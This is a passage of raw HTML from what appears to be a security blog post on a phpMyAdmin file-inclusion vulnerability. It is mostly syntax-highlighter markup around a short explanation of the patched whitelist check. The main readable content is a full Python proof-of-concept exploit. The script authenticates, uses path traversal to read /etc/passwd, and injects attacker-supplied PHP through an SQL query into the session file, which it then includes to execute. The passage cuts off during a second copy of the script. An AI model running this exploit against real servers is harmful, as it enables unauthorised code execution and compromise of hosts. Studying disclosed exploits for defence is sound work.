class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">in_array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">_page<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-v\">whitelist<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">true<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a091706289721-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">false<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a091706289721-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0032 seconds] -->  <\/p>\n<p>We can see that the function Core::CheckPageValidity has another\u00a0parameter, &#8220;$include&#8221;. $include is passed as true from index.php to the function and the whitelist is empty so the function will return false and the vulnerability is now blocked.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b3aa4e01a094559589522\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python  # -*- coding: utf-8 -*-    import re  import sys  import random  import hashlib  import logging  import argparse  import requests  from HTMLParser import HTMLParser    logger = logging  logging.basicConfig(level=logging.DEBUG, format=&#8217;%(levelname)s: %(message)s&#8217;)    URL = None  PROXIES = dict()  page = &#8216;\/index.php&#8217;      def _rand_md5():      return hashlib.md5(str(random.randint(0, 10000000000000000000))).hexdigest()      def get_token(sess, page):      resp = sess.get(URL + page)      try:          token = re.findall(              r&#8217;token&#8221;s*value=&#8221;([^&#8221;]*)&#8221;&#8216;, resp.content, flags=re.MULTILINE)[0]      except IndexError:          logger.error(&#8216;Failed to get CSRF token from server&#8217;)          return None      return HTMLParser().unescape(token)      def main(username, password, php_code, page):      session = requests.Session()      session.proxies = PROXIES      token = get_token(session, page)      session_id = _rand_md5()      response = session.post(URL + page, data={          &#8216;set_session&#8217;: session_id,          &#8216;pma_username&#8217;: username,          &#8216;pma_password&#8217;: password,          &#8216;server&#8217;: 1,          &#8216;target&#8217;: &#8216;index.php&#8217;,          &#8216;token&#8217;: token      })      updir = None      for dir_level in range(8):          updir = &#8216;..\/&#8217; * dir_level          response = session.get(URL + page, params={              &#8216;target&#8217;: &#8216;sql.php%3F\/..\/&#8217; + updir + &#8216;etc\/passwd&#8217;          })          if &#8216;\/sbin\/nologin&#8217; in response.content:              logger.info(&#8216;\/etc\/passwd is %d levels away&#8217;, dir_level)              break      else:          logger.error(&#8216;This version is not vulnerable, or the server is not linux&#8217;)          return 1      token = get_token(session, &#8216;\/server_sql.php&#8217;)      sql = (&#8220;select &#8216;&amp;lt;?php &#8221; + php_code + &#8221; ?&amp;gt;'&#8221;)      logger.debug(&#8216;Executing SQL query %r&#8217;, sql)      response = session.post(URL + &#8216;\/import.php&#8217;, data={          &#8216;is_js_confirmed&#8217;: 0,          &#8216;token&#8217;: token,          &#8216;pos&#8217;: 0,          &#8216;goto&#8217;: &#8216;server_sql.php&#8217;,          &#8216;message_to_show&#8217;: &#8216;Your SQL query has been executed successfully&#8217;,          &#8216;prev_sql_query&#8217;: &#8221;,          &#8216;sql_query&#8217;: sql,          &#8216;sql_delimiter&#8217;: &#8216;;&#8217;,          &#8216;show_query&#8217;: 1,          &#8216;fk_checks&#8217;: 0,          &#8216;SQL&#8217;: &#8216;Go&#8217;,          &#8216;ajax_request&#8217;: &#8216;true&#8217;      })      response = session.get(URL + &#8216;\/index.php&#8217;, params={          &#8216;target&#8217;: (&#8216;db_sql.php%3f\/..\/&#8217; + updir + &#8216;var\/lib\/php\/sessions\/sess_&#8217; + session.cookies[&#8216;phpMyAdmin&#8217;])      })      site = open(&#8216;result.html&#8217;, &#8216;w&#8217;)      site.write(response.content)      if response.status_code == 200:          logger.info(&#8216;Payload succeed. Result is stored inside &#8220;result.html&#8221; file.&#8217;)      else:          logger.error(&#8220;Couldn&#8217;t run payload&#8221;)          return 1      return 0    if __name__ == &#8216;__main__&#8217;:      parser = argparse.ArgumentParser()      parser.add_argument(&#8216;-u&#8217;, &#8216;&#8211;user&#8217;, required=True)      parser.add_argument(&#8216;-p&#8217;, &#8216;&#8211;password&#8217;, required=True)      parser.add_argument(&#8216;-U&#8217;, &#8216;&#8211;url&#8217;, required=True)      parser.add_argument(&#8216;-P&#8217;, &#8216;&#8211;php-payload&#8217;, required=True)      args = parser.parse_args()      URL = args.url      sys.exit(main(args.user, args.password, args.php_payload, page))<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-86\">86<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-87\">87<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-88\">88<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-89\">89<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-90\">90<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-91\">91<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-92\">92<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-93\">93<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-94\">94<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-95\">95<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-96\">96<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b3aa4e01a094559589522-97\">97<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b3aa4e01a094559589522-98\">98<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-2\"><span class=\"crayon-p\"># -*- coding: utf-8 -*-<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-3\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-4\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">re<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-5\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">random<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">hashlib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">logging<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">argparse<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-11\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-e\">HTMLParser <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">HTMLParser<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-13\"><span class=\"crayon-v\">logger<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">logging<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-14\"><span class=\"crayon-v\">logging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">basicConfig<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">level<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">logging<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">DEBUG<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">format<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8216;%(levelname)s: %(message)s&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-15\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-16\"><span class=\"crayon-v\">URL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-17\"><span class=\"crayon-v\">PROXIES<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dict<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-18\"><span class=\"crayon-v\">page<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;\/index.php&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-19\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-21\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">_rand_md5<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">hashlib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">md5<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">str<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">random<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">randint<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10000000000000000000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">hexdigest<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-24\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-25\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">get_token<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sess<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sess<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">URL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">page<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">findall<\/span><span class=\"crayon-sy\">(<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">r<\/span><span class=\"crayon-s\">&#8216;token&#8221;s*value=&#8221;([^&#8221;]*)&#8221;&#8216;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">flags<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">MULTILINE<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">IndexError<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">logger<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">error<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;Failed to get CSRF token from server&#8217;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">None<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-33\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HTMLParser<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">unescape<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">token<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-34\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b3aa4e01a094559589522-35\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b3aa4e01a094559589522-36\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">main<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">username<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">,<\/span><span 